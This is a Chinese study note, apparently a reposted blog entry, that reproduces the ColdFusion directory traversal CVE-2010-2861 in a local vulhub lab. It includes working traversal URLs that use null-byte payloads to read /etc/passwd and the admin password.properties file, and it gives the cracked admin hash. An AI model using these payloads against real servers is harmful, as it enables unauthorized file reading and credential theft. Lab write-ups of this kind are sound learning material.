vulhub学习笔记-Adobe ColdFusion 文件读取漏洞

Adobe ColdFusion 文件读取漏洞

一.漏洞介绍
(一)编号
CVE-2010-2861
(二)概述
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。
(三)影响版本
Adobe ColdFusion 8、9版本

二.操作步骤
(一)Vulhub ip地址:http://192.168.126.136
文件位于:/home/vulhub/vulhub-master/coldfusion/CVE-2010-2861
1.环境搭建 docker-compose build和docker-compose up -d
在这里插入图片描述

2.检查docker是否开启 docker-compose ps
在这里插入图片描述

(二)Windows
1.登录测试页面 http://192.168.126.136:8500/CFIDE/administrator/enter.cfm
用户名密码输入admin 正常安装
2.在首页url输入

http://192.168.126.136:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en

访问/etc/passwd 文件
3.开启拦截抓包
在这里插入图片描述

4.发送到重发器,并修改get位置,再点go
在这里插入图片描述
在这里插入图片描述

代码位于HTML的Tab下
5.在重发器的get 后重新输入

http://192.168.126.136:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en

获取后台管理员密码
在这里插入图片描述

密码值为D033E22AE348AEB5660FC2140AEC35850C4DA997
经过SHA-1加密,解密为admin

三.漏洞防护
(一)尽快升级到最新版本

参考文章https://blog.csdn.net/JiangBuLiu/article/details/93997549

本篇为自我学习回顾,不能保证正确!!!
网络信息安全-ploto

猜你喜欢

转载自blog.csdn.net/ploto_cs/article/details/108527869